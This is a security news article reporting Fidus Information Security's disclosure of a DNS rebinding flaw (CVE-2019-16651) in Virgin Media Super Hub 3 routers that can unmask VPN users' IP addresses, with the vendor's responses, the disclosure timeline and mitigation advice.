Disclosure comes two years after privacy-busting flaw was discovered
A zero-day vulnerability in Virgin Media Super Hub 3 routers enables attackers to unmask the true IP addresses of (https://portswigger.net/daily-swig/vpn) users, security researchers have revealed.
Fidus Information Security, a UK (https://portswigger.net/daily-swig/pen-testing) consultancy, has published details of the flaw nearly two years after first alerting Virgin Media, a British telco, which referred Fidus to Liberty Global, its parent company.
Fidus’ R&D team said it initially delayed disclosure for 12 months at the vendor’s request, but subsequent attempts to contact Virgin Media and Liberty Global then failed to elicit responses.
However, Virgin Media has told The Daily Swig that it is currently working on a “technical fix” for what it also described it as an “edge-case issue, potentially impacting only a very small subset of customers” who use VPNs.
Researchers were able to mount a (https://portswigger.net/daily-swig/dns) rebinding attack that revealed a VPN user’s IP address “by [the user] simply visiting a [malicious] webpage for a few seconds”, reads a (https://fidusinfosec.com/silently-unmasking-virgin-media-vpn-users-in-seconds-cve-2019-16651/) drafted by Fidus in March but eventually published last week.
(https://www.tripwire.com/state-of-security/vert/practical-attacks-dns-rebinding/) weaponize a victim’s browser by making it a proxy for attacking private networks.
Privacy implications
The researchers successfully de-anonymized devices whose IP addresses were masked by most “market leading VPNs”, Fidus’ R&D team told The Daily Swig.
However, some VPN providers repelled the attack by blocking access to local IP addresses by default.
“Some blocked the attack by ‘accident’ by preventing LAN traffic but when this was turned off, as many people do, they instantly became vulnerable,” said Fidus.
“The privacy implications are quite severe in this scenario due to the silent nature of the vulnerability,” said Fidus. “In theory, it could be utilised on any popular (likely compromised) webpage and be used to unmask users who are browsing using a VPN.
“Other, more unlikely, scenarios are (https://portswigger.net/daily-swig/cyber-warfare) or law-enforcement capable bodies using this to unmask both criminals but also those utilising a VPN solution for their own safety.”
However, a Virgin Media spokesperson said that “a very specific set of circumstances would need to be in place for a customer to be impacted, meaning that the risk to them is very low.”
Hardware supply chain
The researchers tested the exploit against the (https://www.commscope.com/product-type/broadband-video-devices/broadband-devices/docsis-3.0-gateways-modems/tg2492), but Fidus believes the vulnerability probably works against all related models.
Liberty Global has deployed the ARRIS series of DOCSIS fiber routers through multiple internet service providers that it owns worldwide, said Fidus.
The ARRIS brand is actually owned by (https://portswigger.net/daily-swig/network-security) infrastructure provider CommScope, but Fidus believes Liberty Global owns the firmware.
“They were really vague with all the information which really didn’t help us in any shape or form,” said Fidus. “We did request information for who else to pass it to and that was never given to us.”
Timeline
Liberty Global was first alerted to the (https://portswigger.net/daily-swig/vulnerabilities) (CVE-2019-16651) on October 20, 2019.
On February 21, 2020, the company requested a year-long delay to public disclosure – which Fidus agreed to.
However, three subsequent requests for updates from Liberty Global – on December 9 and 21 of 2020, then March 15, 2021 – failed to elicit a response from the vendor.
Although Virgin Media has yet to complete remediation, the company said: “We have strong security measures in place to protect our network and keep our customers secure. We are not aware of any customers being affected by this issue and they do not need to take any action.”
However, Fidus advises users to “firewall traffic to the router (which obviously isn’t overly user friendly) or ensure LAN traffic on a VPN is blocked” if they want to protect themselves.
SOURCE: The Daily Swig